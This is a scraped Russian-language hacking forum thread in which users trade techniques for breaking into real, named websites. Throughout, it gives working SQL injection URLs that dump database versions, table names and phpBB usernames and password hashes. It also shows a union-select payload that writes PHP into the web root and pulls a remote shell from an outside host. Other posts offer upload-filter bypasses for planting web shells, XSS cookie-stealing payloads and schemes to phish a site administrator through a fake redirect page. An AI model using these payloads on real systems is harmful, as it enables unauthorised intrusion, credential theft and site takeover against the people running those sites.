Думается, что shell.php.jpg заливать смысла нет ))... Как быть?
Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.

2 wildshaman:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=97

Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif)
file_priv отключён, доступа к mysql.user нет, только в админку.
Думается, что shell.php.jpg заливать смысла нет ))... Как быть?
Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.
Если проверяеться только расширения, но не сам факт что это картинка попробуй null байт, shell.php%00.jpg, если проверяеться сам факт что это картинка, то запихни в маленку картинку, например в .gif код шелла, и посмотри что бы валидно открывалась картинка и попробуй то же самое, а вообше че за админка? Паблик движок или самопис?

2 wildshaman:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=97 Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает :)

2 wildshaman
Смотри запрос который дал R1dex на предыдущей странице

Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает


гы, я не спорю, похоже на бред, конечно, но есть разница таки между:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49

и

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49

насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки:)) Но blind-sql-inj есть не только в пятой ветке

гы, я не спорю, похоже на бред, конечно, но есть разница таки между:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49

и

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49

насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые
да, в принципе ты прав, но, в concat_ws если у тебя первый запрос вернет error то остальные выполняться не будут, то есть, что я хочу сказать, там есть check6ga_forums.phpbb_users и

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+use r_password+from+phpbb_users+LIMIT+1,1),(select+use r_password+from+phpbb_users+LIMIT+1,1)),1,1)))=97

нам будет возврашено
Table 'check6ga_forums.admin' doesn't exist,
потому как первый запрос в concat_ws вернул error остальные запросы в concat_ws не выполнились, поэтому использования 3 запросов в concat_ws без смыслено.

не могу не согласиться, туплю чото сегодня по черному. +

проверка:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+admin),1,1)))=49

найденная таблица (и уже случайно колонка):

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+phpbb_users),1,1)))=49

брут колонок из phpbb_users :

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser+from+phpbb_users),1,1)))=49

сбрутилась еще одна:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users),1,1)))=49

ну в общем стандартные колонки из форума phpbb, значит есть поле и user_password:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser_password+from+phpbb_users),1,1)))=49

Далее понятно

но все таки напишу:

ищем ник 1 пользователя в базе:

проверяем на 1-ую буковку 'a':

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),1,1)))=97

угадали, отлично, проверяем вторую букву далее по алфавиту:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=98

не подходит, и так дошлепали до 110, буква 'n':

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=110

на всякий случай проверяем нашу догадку:

http://www.check6gaming.com/news.php?id=67+AND+substring((select+username+from +phpbb_users+limit+0,1),1,2)='an'

значит всё верно. И так бомбим до победного конца. Тоже самое с user_password

2 wildshaman:
ещё слепые inj:
http://www.trunov.com/content.php?act=showcat&id=11+and+substring(@@version,1,1)=4
http://www.sisterstates.com/statetaxforms.php?id=11+and+substring(@@version,1, 1)=4
версия мускула = 4

2 wildshaman:
ещё слепые inj:
http://www.trunov.com/content.php?act=showcat&id=11+and+substring(@@version,1,1)=4
http://www.sisterstates.com/statetaxforms.php?id=11+and+substring(@@version,1, 1)=4
версия мускула = 4
спасиб, а то я новичок в этом деле, еще не все понятно)

http://www.reciprodate.com/home.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x7c,version(),user(),da tabase()),22,23,24,25/*

4.0.27-standard|reciprodate@localhost|reciprodate

Мужики, а что можна с такой ошибкой сделать?

http://news.qs.kiev.ua/lenta/s.php?s=1'

тут вроде фильтрация стоит у меня ничё не прошло...

А такой вопрос.
Сайт в локалке у нас...есть скуль
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_N AME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFO RMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх

vakula

version() - за место 3его поля.

vakula

version() - за место 3его поля.

игнорирует, исходную показывает. а если ошибку сделаю или не в то поле...тогда показывает что ошибка.

А такой вопрос.
Сайт в локалке у нас...есть скуль
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_N AME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFO RMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх

1. Попробуй:

http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15--

2. Возможно, там просто нету вывода.

1. Попробуй:

http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15--

2. Возможно, там просто нету вывода.

пустота, а раньше показывало...убрали небось

p.s. дай линк где описывается поиск уязвимостей

спс

пустота, а раньше показывало...убрали небось

p.s. дай линк где описывается поиск уязвимостей

спс
Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. :confused:

пустота, а раньше показывало...убрали небось

p.s. дай линк где описывается поиск уязвимостей

спс

Пробуй крутить, как слепую.

SQL injection полный FAQ (http://forum.antichat.ru/thread43966.html)

SQL инъекция (в т.ч. и blind SQL) (http://forum.antichat.ru/thread19844.html)

Помогите, пожалуйста, с заливкой шелла.

Есть сайт на дедике, на дедике установлена Windows Server 2003.
Есть MySQL 4 версии, раскрученная.
Есть путь вида: M:\Inetpub\vhosts\[SITE]\httpdocs\script.php - он выводится при ошибке скули.
Есть привилегии типа File_Priv

Будет неплохо, если набросаете хороших faq или статей. Те, что гуглил я не помогли. Желательно расписать очень подробно. с Linux только начинаю дружить.

Заранее спасиб.

Basilio
union select 1,<?php copy("http://tvoi.site/shell.txt","./shell.php"); ?>,3 from mysql.user into outfile 'M:\Inetpub\vhosts\[SITE]\httpdocs\scr.php'/*
Потом переходишь на scr.php, и шелл копируется в shell.php ;)

p.s: php код лучше в hex перевести ;)

Basilio

Потом переходишь на scr.php, и шелл копируется в shell.php ;)

p.s: php код лучше в hex перевести ;)

а какой шелл лучше использовать (кинь линк), конфигурацию я написал.
Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?

Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?
Я вроде видел кроме.

а какой шелл лучше использовать
ну r57 попробуй (google.com)

Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха
)) тебе какой шелл то нужен?
на милворме вообще шеллов нет... ;)

лююддии help me
Есть скуль на сайте
база MSSQL
ввожу
index.cfm?page=search&searchstring1-222-1933email@address.tst&searchtype=@@version или (select+system_user)
все нормально выводит
но как только пытаюсь вывести имена таблиц,
(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATIO N_SCHEMA.TABLES)
то просто открывается страница сайта, не каких ошибок и прочего
если так
(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATIO N_SCHEMA.TABLES)--
то ошибка Incorrect syntax near the keyword 'order'.

В чем трабла? как вывести имена таблиц и колонок?

Ссылку в студию.

Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. :confused:
вывод ошибок остался

Пробуй крутить, как слепую.

SQL injection полный FAQ (http://forum.antichat.ru/thread43966.html)

SQL инъекция (в т.ч. и blind SQL) (http://forum.antichat.ru/thread19844.html)

всё, порешал спасибо. просто перед id=1302 нада біло поставить `-` id=-1302

всё, порешал спасибо. просто перед id=1302 нада біло поставить `-` id=-1302

Я в начале так и предлагал сделать, ну да ладно.

Я в начале так и предлагал сделать, ну да ладно.
Я не обратил внимание, думал ты за окончание скуля говорил. Спс тебе за всё, очень помог, я много понял благодаря тебе.

Ссылку в студию.
линк не могу дать пока :)
Я так понял, если выводить существующую колонку из существующей базы то просто загружается страница сайта, а если фейковую то ошибка invalid column name и т.п

ну r57 попробуй (google.com)


)) тебе какой шелл то нужен?
на милворме вообще шеллов нет... ;)

значит я что-то путаю. или чего-то не знаю.

Есть еще вопрос.
Пользователь базы - root, почему не записываются файлы с шеллом? (перекодировал код пхп в хекс)
Папки с кешом не найти, пхпмайадмин тоже хз где?

Altermannn
http://www.dance4you.ru/teachers/info/data/ic_6/381'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25/**/

Чёто я не пойму по моему эт не инъекция! Нжна помощь?

geforce походу фильтрует +
но странно вывода помоему ваще нету.. или я неправильно составляю запрос.. а кавычку там не нужно сюдя по запросу..

Basilio
посмотри если есть права.. попробуй лоад файл сначало... потом если есть права пробуй сначало успешно залить в /tmp/shell.php потом прочитать его.. если все ок.. читай конфиг апача там где виртуал хостс бери пути... можеш еще прикинуть пути через /etc/passwd

geforce походу фильтрует +
но странно вывода помоему ваще нету.. или я неправильно составляю запрос.. а кавычку там не нужно сюдя по запросу..

Basilio
посмотри если есть права.. попробуй лоад файл сначало... потом если есть права пробуй сначало успешно залить в /tmp/shell.php потом прочитать его.. если все ок.. читай конфиг апача там где виртуал хостс бери пути... можеш еще прикинуть пути через /etc/passwd

там чпу все карты путает, просто входные даные не проходят urldecode и пробел %20 и + остаються как они есть без преобразования, /**/ такую конструкцию не проведешь т.к. htacess по всей видимости как то преобразует запрос, короче если бы браузер не преобразовал просто пробел в %20 то запрос такой(cсудя по гвери 7 колонок выбераеться):
-381 union select 1,2,3,4,5,6,7--
Нужно что то использовать вместо пробелов

%0D,%2B,%09,%0A,%20,+,%2B,/**/,$IFS
прокатит только прямое обращение к скрипту?ic_6=381/**/...
Basilio, 1. права mysql.user 2. права субд (юзверя под которым запущен процесс)
Octave_Parangop, да _bethinking.org/resource.php?ID=233'+order+by+99--+

%0D,%2B,%09,%0A,%20,+,%2B,/**/,$IFS
прокатит только прямое обращение к скрипту?ic_6=381/**/...

а ты уверен что опять чпу(.htacess) не захочет преобразовать / в свою переменую?

Ребята, скуля?
http://www.bethinking.org/resource.php?ID=233' ?

По моему нет! Он вроде фильтруется!

Кто "он"?


ЗЫ: Сверху уже два раза раскрутили эту скулю ^^

Кто "он"?


ЗЫ: Сверху уже два раза раскрутили эту скулю ^^

Сори! Не увидел! он это запрос к базе! Фильтруется /*!

1. там закрыт доступ к
http://www.bethinking.org/resource.php?ID=233'+union+select+1,2,3,4,5,6,7,8, 9,0,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(tabl e_name,1),1),18,19+from+information_schema.tables--+
пишет:
Access denied for user 'uccfapologist'@'server1.uccf.org.uk' to database 'information_schema'

Как тогда посмотреть содерживое скулы только на угад?

Там 4 ветка )
http://www.bethinking.org/resource.php?ID=233'+union+select+1,UNHEX(HEX(vers ion())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19--+

2 AkyHa_MaTaTa:

не что-то, а именно в данном конкретном случае катит /**/

http://www.aperitif.no/?id=13'
редирект
http://www.aperitif.no/?id=13+order+by+3-- главная страница + ошибки
вывод сделать не получается, все время редирект

Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((

Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((

Можно редиректнуть его на фейк через META refresh<meta http-equiv="refresh" content="0;url=http://урл_фейка/" />
или

можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать).

Хотя это муторно и не факт, что реализуемо на практике, но просто идея :) (Зато без скриптов :) )

Можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать).

Хотя это муторно и не факт, что реализуемо на практике, но просто идея :) (Зато без скриптов :) )

Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...

2 AkyHa_MaTaTa:

не что-то, а именно в данном конкретном случае катит /**/

не согласен, давай проведем маленький экспиремент, и так смотри, я буду основываться на показываемой ошибке как конечном результате, и так смотрем гверю:

http://www.dance4you.ru/teachers/info/data/ic_6/-381'


SELECT A.id,
A.parent_id,
UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate,
A.ip,
B.var,
B.data
FROM sapi_tree A,
sapi_data B
WHERE A.id=B.parent_id
AND
A.id=-381'


и так судя по всему 7 колонок выбераеться,
и так вызываем ошибку и пробуем посмотреть
http://www.dance4you.ru/teachers/info/data/ic_6/-381'/**/union/**/select/**/1,2,3,4,5,6,7,2,3,4,5,6--
и имеем в ответ

SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'

то есть кавычка прошла а все остольное нет и что бы в это убедиться смотрем так
http://www.dance4you.ru/teachers/info/data/ic_6/-381'+union+select/**/1,2,3,4,5,6,7,2,3,4,5,6--

SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'+union+select

то все что до /**/ проходит в переменую и вставляеться в гверю а все остольное нет, по все видимости в .htacess ишет значения переменой именно между / / и вставляет ее в запрос, сорее всего,как написал l1ght, только прямое обрашения к скрипту даст какой то результат.

Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?... Я даже твой пост с трудом понимаю из-за количества ашипок.

Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(

Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...( Meta refresh, как я писал выше, только его надо будет быстро удалить, или поработать некоторое время в качестве прокси, который будет этот редирект вырезать с отдаваемой страницы.

P.S.
А если перерисовать страницу стилями то вернуть всё обратно будет просто, т.к. тебе надо будет либо почистить тот CSS который инклудится, либо поставить display: none !important; на всё то что ты добавил на страницу, и display: block !important; на всё что убрал.

Народ, нужна помощь, есть скуля с таблами, есть табла phpbb_users, но она я так понял пустая....о воще все перебрал..не работают..помогите плиз, в чём ошибка?
версия 5.0.51a
скуля с таблами
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_name,4,5,6,7%2 0FROM%20INFORMATION_SCHEMA.TABLES

нада логин и пасс админа

http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_schema,4,5,6,7 +from+information_schema.tables+where+table_name=0 x70687062625F7573657273
forumvdn
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,database(),4,5,6,7
vdn

Таблица в другой базе

Поля
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,column_name,4,5,6,7+ from+information_schema.columns+where+table_name=0 x70687062625F7573657273

Вот вывод
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,username,4,5,6,7%20F ROM%20forumvdn.phpbb_users

А вот хелп на будующее:
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597

Мужики, это уязвимость?

http://cronos.net.ru/qwests.php?id=1'

Мужики, это уязвимость?

http://cronos.net.ru/qwests.php?id=1'
раскрытие путей, не более

Мужики, это уязвимость?

http://cronos.net.ru/qwests.php?id=1'
open_basedir ()

xss
http://cronos.net.ru/database.php?type=%3Cscript%3Ealert(document.cooki e)%3C/script%3E

угу...спс.

а не подскажите прогу для поиска sql уязвимостей на сайте?
а язна, гугль рулит....но хотелось бы ваши личные советы

Мужики, это уязвимость?

http://cronos.net.ru/qwests.php?id=1'

Там рядом скуля...

http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(vers ion())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22--

а не подскажите прогу для поиска sql уязвимостей на сайте?
а язна, гугль рулит....но хотелось бы ваши личные советы

Руки ^^

Всем, хай.
Подскажите.
Есть скуля, далее:
=-77+union+select+1,2,3,4,5,6,7,8,9,10--
вываливается ошибка:
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
Я так понимаю я не правильно строю запрос?
Попробовал несколько вариантов, тоже самое.
Подскажите, где косяк?

=-77'+union+select+1,2,3,4,5,6,7,8,9,10--

?

Всем, хай.
Подскажите.
Есть скуля, далее:
=-77+union+select+1,2,3,4,5,6,7,8,9,10--
вываливается ошибка:
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
Я так понимаю я не правильно строю запрос?
Попробовал несколько вариантов, тоже самое.
Подскажите, где косяк?

дай ссыль полную
это скуля

мужики, 407 таблиц...помогите найти нужную, плиз

http://soft.dndz.dp.ua/program.php?id=-781%20UNION%20SELECT%201,2,3,table_name,5,6,7,8,9, 10,11,12,13,14,15%20FROM%20INFORMATION_SCHEMA.TABL ES%20limit%20392,1%20--

Вот запрос - выдергивает все таблицы, в которых есть колонка "password"

http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5, 6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA. columns+where+column_name=0x70617373776f7264--

С колонкой - login

http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5, 6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA. columns+where+column_name=0x6c6f67696e--

нихрена не пойму, там на сайте есть форум....а где табла с юзерами??? :confused:

Там рядом скуля...

http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(vers ion())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22--


а как в таком случае прописывать таблу? from users? или в хексе?

from+users--

http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+order+by+23&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp

Насколько я помню, в access, в запросе обязательно должна присутствовать таблица.. Вот только ни одну не подобрать...

http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
это Microsoft Access статья https://forum.antichat.ru/showthread.php?t=50550

===== R1dex
И что? Это системная табла и как я вижу - доступ закрыт.

я не видел что ты уже отписался ;)

http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp


И что? Это системная табла и как я вижу - доступ закрыт.

судя по from user, from password хорошие данные с хорошим префиксом) или в другой дб
rofl продвинутый способ локального инклуда (в серьёз не воспринимать) :) _eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+\boot.ini.lalala&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp

Не понял, что там про from user, from password?
Насколько мне известно, таких таблиц в Microsoft access не может быть. Или я что-то путаю?

Официальный сайт Евгении Власовой.
Народ, я так понимаю это скуля?
http://www.vlasova.com.ua/news.php?item=70'
но роскрутить её дальше не могу...попробуйте

Официальный сайт Евгении Власовой.
Народ, я так понимаю это скуля?
http://www.vlasova.com.ua/news.php?item=70'
но роскрутить её дальше не могу...попробуйте
http://www.vlasova.com.ua/news.php?item=-70'+UniOn+SelecT+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7/*

4.1.22:vlasova:u_vlasova@localhost

кто найдёт таблу, отпишитесь

Нашел вот скулю: http://students.msm.ru/sc/?act=view&op=anketa&uid=-1000'+union+select+1,version(),3,4,5,6,7,user(),da tabase(),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50+/*
Но никак не получается подобрать таблицы и столбцы((( Кому не влом, плиз, помогите...

народ как засунуть шелл в формат .jpg
ну как на видео делают, там они заливают картинку а там шелл что то типа такого

ACD или FastStone редактировать EXIF в Image Properties

Кто подскажет щас нормально работает сервис по сниферам http://na-s.ru/ ?
А то почему то мне логи не проходят

Свой снифак давно надо юзать, вот, от каника:

http://pashkela.narod.ru/sniffer.rar

XSS
Что можно попробовать если фильтр сжирает </script>

http://www.inattack.ru/article/519.html

народ как засунуть шелл в формат .jpg
ну как на видео делают, там они заливают картинку а там шелл что то типа такого
Все еще интересует!

Pashkela ACD несколько версий и я не знаю какую качать а вторая не хочет устанавливаться

diznt
читай (http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/)

помогите плиз найти таблицу с юзерами и пассами все облазил нигде не нашел((

http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables--

вывод всех таблиц

p.s. Сайт казанского государственного университета

pinky07, используй limit в запросах:
http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+30,20--

а то там скрипт только 20 таблиц выдает.

здрасти, собрался ставить булку так вот интересует вопрос как поставить фиксы на хаки(эксплоиты) или же надо самим в ручную капаца в php коде и вправлять?

самому менять или ставить зафиксеные хаки

Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка

Could not obtain post/user information.

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8

SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3

Line : 449
File : viewtopic.php"
Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value="&gt;&gt;"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??

Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка

Could not obtain post/user information.

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8

SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3

Line : 449
File : viewtopic.php"
Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value="&gt;&gt;"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??

1. "....тоесть в это поле можно вести только 3 символа!!" сохраняешь исходник страницы, правишь полный путь в форме к скрипту, и удаляешь параметр size="3". Как вариант отлавливаешь запрос naviscope+inetcrack правишь и отправляешь.

2. по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit

Такую же ошибку(почти) могу вызвать в другом скрипте про limit там вот что:
t.topic_last_post_id DESC LIMIT -30, 30

Line : 273
File : viewforum.php

не по сабжу

по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit
инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.

инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.
Только не после ордера :)
ORDER BY p.post_time DESC LIMIT -3, 3

Значит инъекция не возможна?Щас толька ссылка была недавно уже нет!Толи автор удалил свой пост толи мне выспаться нужно!Если автор удалил можешь дать почитать?

Qam Инъекция в лимите после ORDER BY невозможна, я думал ответ на твой вопрос дан

2 Qam
https://forum.antichat.ru/showthread.php?t=56446

Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)

Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)Боюсь отвечать на Ваш вопрос , во избежании причисления меня к "всеведущим гуру андеграундного мира" :)

По теме: дать ссылку

http://www.rncb.ru/print_view.php?id=450&fpath=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 +--+

используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь SELECT HEX('tablename') и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D

помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/

Не могу понять где здесь таблицы форума???

помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/

Не могу понять где здесь таблицы форума???
По форуму видно, что это phpbb. Какая версия я хз, с этим форумом мало знаком. Вот 3 таблицы:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables+where+table_name+like+0x257 068706262257573657273--
какая-то из них нужная.
зы: админы того сайта просто ппц - кучу софта понаставили, помойка просто)

используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь SELECT HEX('tablename') и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D

или же просто используете php функцию =)

echo "0x".bin2hex("что надо захекстить");

